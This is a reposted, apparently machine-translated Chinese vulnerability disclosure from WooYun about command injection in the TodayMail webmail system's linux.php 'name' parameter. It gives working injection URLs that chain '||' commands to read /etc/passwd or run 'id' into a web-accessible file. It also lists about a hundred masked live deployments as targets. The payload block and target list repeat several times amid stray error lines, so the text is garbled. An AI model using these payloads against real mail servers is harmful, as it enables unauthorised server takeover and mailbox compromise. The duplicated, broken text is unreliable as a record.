TodayMail邮件系统存在命令执行至少上万邮箱可被控制(官网演示)
漏洞标题 TodayMail邮件系统存在命令执行至少上万邮箱可被控制(官网演示) 相关厂商 广东时代互联科技有限公司 漏洞作者 路人甲 提交时间 2016-03-21 16:59 公开时间 2016-…
漏洞标题
TodayMail邮件系统具有执行至少数万个可控制邮箱的命令(官方网站演示)
相关制造商
广东时代互联网科技有限公司
漏洞作者
过路人
提交时间
2016-03-21 16: 59
公共时间
2016-06-19 17: 40
漏洞类型
命令执行
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Php源查看,不过滤敏感文件操作参数
漏洞详细信息
关于使用量不多说,以下链接
/mailcontrol/linux.php?name=x||cat%20/etc/passwd>/webmail/data/wo.txt||x
可以直接执行任何命令来获取服务器权限
官方网站演示测试:
0x1http://**。**。**。**/webmail/login.php
访问
http://**。**。**。**/mailcontrol/linux.php?name=x || id>/webmail/data/wo.txt || x
您可以在数据目录中生成wo.txt。
http://**。**。**。**/webmail/data/wo.txt
0x2http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/data/wo.txt
案件非常多,仅提供100多个案例:
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
Failure when receiving data from the peer
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
**。**。**。** /网络邮件/login.php中
http://**。**。**。**。mo/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
**。**。**。**: 88/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**。mo/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
Failure when receiving data from the peer
0x1http://**。**。**。**/webmail/login.php
访问
http://**。**。**。**/mailcontrol/linux.php?name=x || id>/webmail/data/wo.txt || x
您可以在数据目录中生成wo.txt。
http://**。**。**。**/webmail/data/wo.txt
0x2http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/data/wo.txt
修理计划:
过滤它
版权声明:请注明出处。居民A @乌云
0x2http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/data/wo.txt
案件非常多,仅提供100多个案例:
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
Failure when receiving data from the peer
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
**。**。**。** /网络邮件/login.php中
http://**。**。**。**。mo/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
**。**。**。** /网络邮件/login.php中
http://**。**。**。**/webmail/login.php
**。**。**。**: 88/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**。mo/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/login.php
Failure when receiving data from the peer
0x1http://**。**。**。**/webmail/login.php
访问
http://**。**。**。**/mailcontrol/linux.php?name=x || id>/webmail/data/wo.txt || x
您可以在数据目录中生成wo.txt。
http://**。**。**。**/webmail/data/wo.txt
0x2http://**。**。**。**/webmail/login.php
http://**。**。**。**/webmail/data/wo.txt
修理计划:
过滤它
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 553 )
- 分类:黑客技术
